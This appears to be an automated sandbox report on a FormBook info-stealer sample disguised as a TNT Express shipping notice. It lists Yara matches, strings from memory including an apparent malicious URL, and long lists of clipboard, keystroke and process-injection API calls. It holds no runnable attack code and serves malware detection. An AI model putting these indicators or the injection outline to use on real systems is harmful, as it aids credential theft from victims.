Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: getmac.exe, 00000004.00000002.3833043675.0000000006806000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004186000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.iqejgn.asia/9rz8/?wLTtn0=1tNn

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0093EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0093EAFF

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0093ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0093ED6A

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

0_2_0093EAFF

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0092AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0092AA57

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_00959576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00959576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3a9bbe47-d
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_da19deb1-1
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1e8a9f55-7
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_779c9935-a

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
Source: initial sample	Static PE information: Filename: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C6D3 NtClose,	2_2_0042C6D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B60 NtClose,LdrInitializeThunk,	2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,	2_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274340 NtSetContextThread,	2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274650 NtSuspendThread,	2_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BA0 NtEnumerateValueKey,	2_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B80 NtQueryInformationFile,	2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BE0 NtQueryValueKey,	2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BF0 NtAllocateVirtualMemory,	2_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AB0 NtWaitForSingleObject,	2_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AF0 NtWriteFile,	2_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AD0 NtReadFile,	2_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F30 NtCreateSection,	2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F60 NtCreateProcessEx,	2_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FA0 NtQuerySection,	2_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FB0 NtResumeThread,	2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F90 NtProtectVirtualMemory,	2_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FE0 NtCreateFile,	2_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E30 NtWriteVirtualMemory,	2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EA0 NtAdjustPrivilegesToken,	2_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E80 NtReadVirtualMemory,	2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EE0 NtQueueApcThread,	2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D30 NtUnmapViewOfSection,	2_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D00 NtSetInformationFile,	2_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D10 NtMapViewOfSection,	2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DB0 NtEnumerateKey,	2_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DD0 NtDelayExecution,	2_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C00 NtQueryInformationProcess,	2_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C60 NtCreateKey,	2_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C70 NtFreeVirtualMemory,	2_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CA0 NtQueryInformationToken,	2_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CF0 NtOpenProcess,	2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CC0 NtQueryVirtualMemory,	2_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273010 NtOpenDirectoryObject,	2_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273090 NtSetValueKey,	2_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032739B0 NtGetContextThread,	2_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D10 NtOpenProcessToken,	2_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D70 NtOpenThread,	2_2_03273D70
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050435C0 NtCreateMutant,LdrInitializeThunk,	4_2_050435C0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05044650 NtSuspendThread,LdrInitializeThunk,	4_2_05044650
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05044340 NtSetContextThread,LdrInitializeThunk,	4_2_05044340
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_05042D10
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_05042D30
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042DD0 NtDelayExecution,LdrInitializeThunk,	4_2_05042DD0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_05042DF0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042C60 NtCreateKey,LdrInitializeThunk,	4_2_05042C60
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_05042C70
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_05042CA0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042F30 NtCreateSection,LdrInitializeThunk,	4_2_05042F30
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042FB0 NtResumeThread,LdrInitializeThunk,	4_2_05042FB0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042FE0 NtCreateFile,LdrInitializeThunk,	4_2_05042FE0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_05042E80
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_05042EE0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_050439B0 NtGetContextThread,LdrInitializeThunk,	4_2_050439B0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042B60 NtClose,LdrInitializeThunk,	4_2_05042B60
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_05042BA0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_05042BE0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_05042BF0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042AD0 NtReadFile,LdrInitializeThunk,	4_2_05042AD0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042AF0 NtWriteFile,LdrInitializeThunk,	4_2_05042AF0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05043010 NtOpenDirectoryObject,	4_2_05043010
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05043090 NtSetValueKey,	4_2_05043090
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042D00 NtSetInformationFile,	4_2_05042D00
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05043D10 NtOpenProcessToken,	4_2_05043D10
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05043D70 NtOpenThread,	4_2_05043D70
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042DB0 NtEnumerateKey,	4_2_05042DB0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042C00 NtQueryInformationProcess,	4_2_05042C00
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042CC0 NtQueryVirtualMemory,	4_2_05042CC0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042CF0 NtOpenProcess,	4_2_05042CF0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042F60 NtCreateProcessEx,	4_2_05042F60
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042F90 NtProtectVirtualMemory,	4_2_05042F90
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042FA0 NtQuerySection,	4_2_05042FA0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042E30 NtWriteVirtualMemory,	4_2_05042E30
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042EA0 NtAdjustPrivilegesToken,	4_2_05042EA0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042B80 NtQueryInformationFile,	4_2_05042B80
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_05042AB0 NtWaitForSingleObject,	4_2_05042AB0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030D9210 NtDeleteFile,	4_2_030D9210
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030D92C0 NtClose,	4_2_030D92C0
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030D9110 NtReadFile,	4_2_030D9110
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030D9420 NtAllocateVirtualMemory,	4_2_030D9420
Source: C:\Windows\SysWOW64\getmac.exe	Code function: 4_2_030D8FA0 NtCreateFile,	4_2_030D8FA0

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0092D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0092D5EB

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_00921201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00921201

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0092E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0092E8F6

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00932046	0_2_00932046
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008C8060	0_2_008C8060
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00928298	0_2_00928298
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008FE4FF	0_2_008FE4FF
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008F676B	0_2_008F676B
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00954873	0_2_00954873
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008ECAA0	0_2_008ECAA0
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008CCAF0	0_2_008CCAF0
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008DCC39	0_2_008DCC39
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008F6DD9	0_2_008F6DD9
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008C91C0	0_2_008C91C0
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008DB119	0_2_008DB119
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E1394	0_2_008E1394
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E1706	0_2_008E1706
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E781B	0_2_008E781B
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E19B0	0_2_008E19B0
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008C7920	0_2_008C7920
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008D997D	0_2_008D997D
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E7A4A	0_2_008E7A4A
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E7CA7	0_2_008E7CA7
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E1C77	0_2_008E1C77
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008F9EEE	0_2_008F9EEE
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_0094BE44	0_2_0094BE44
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E1F32	0_2_008E1F32
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008B3640	0_2_008B3640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418743	2_2_00418743
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041000A	2_2_0041000A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410013	2_2_00410013
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028E0	2_2_004028E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041691E	2_2_0041691E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416923	2_2_00416923
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403190	2_2_00403190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410233	2_2_00410233
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E2B3	2_2_0040E2B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E3F9	2_2_0040E3F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402383	2_2_00402383
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402390	2_2_00402390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042ECC3	2_2_0042ECC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402540	2_2_00402540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D40	2_2_00402D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404534	2_2_00404534
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D36	2_2_00402D36
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033003E6	2_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C02C0	2_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230100	2_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033001AA	2_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81CC	2_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264750	2_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C6E0	2_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03300591	2_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4420	2_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F2446	2_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EE4F6	2_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6BD7	2_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330A9A6	2_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324A840	2_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032268B8	2_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E8F0	2_2_0326E8F0
